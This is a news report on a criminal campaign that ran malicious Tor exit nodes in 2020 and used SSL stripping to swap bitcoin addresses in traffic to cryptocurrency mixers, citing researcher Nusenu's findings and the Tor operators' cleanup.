Attackers on the fly replace bitcoin wallets in users’ browsers in order to intercept the funds being sent.
An unknown cybercriminal group added servers to the Tor network in order to carry out an SSL stripping attack on users of the Tor browser conducting transactions with cryptocurrencies. Their task was to replace target BTC addresses directly in traffic, thereby depriving their victims of digital currency.
Cybercriminals began their activity in January 2020, and by May 2020 controlled a quarter of all exit nodes of the Tor network (23.95% or 380 pieces). Through these servers, user traffic leaves the Tor network and enters the open Internet.
The scope of the operation is difficult to determine, according to security researcher Nusenu, but he was able to identify almost four hundred malicious exit nodes that were under the control of attackers at the peak of the operation.
By manipulating traffic passing through controlled Tor exit nodes, the attackers used a man-in-the-middle (MITM) attack technique on Tor browser users. In particular, they were interested in visitors to sites related to cryptocurrencies.
To be more precise, cybercriminals carried out the so-called SSL stripping – they rolled back users’ HTTPS traffic to less secure HTTP. As Nusenu explained, the goal of the attackers was to replace bitcoin addresses inside HTTP traffic sent to bitcoin mixers (services for anonymizing cryptocurrency transactions). By changing bitcoin addresses at the level of HTTP traffic, cybercriminals successfully intercepted the cryptocurrency without its owners noticing.
Using a technique called “SSL Stripping," the attackers swapped users’ encrypted HTTPS traffic for unencrypted HTTP, allowing them to freely parse and modify the intercepted data as they saw fit before it left the Tor network. Thus, they got the opportunity to search for Bitcoin wallet addresses in user traffic, and then replace them with their own.
As a result of the attack, a Tor Browser user, when trying to transfer funds from his Bitcoin wallet to another Bitcoin wallet, could easily give the funds to scammers.
In June of this year, the operators of the Tor network carried out a "cleansing", significantly weakening the attacking power of the attackers. They managed to significantly reduce the influence of intruders, however, more than 10% of network traffic remains under their control.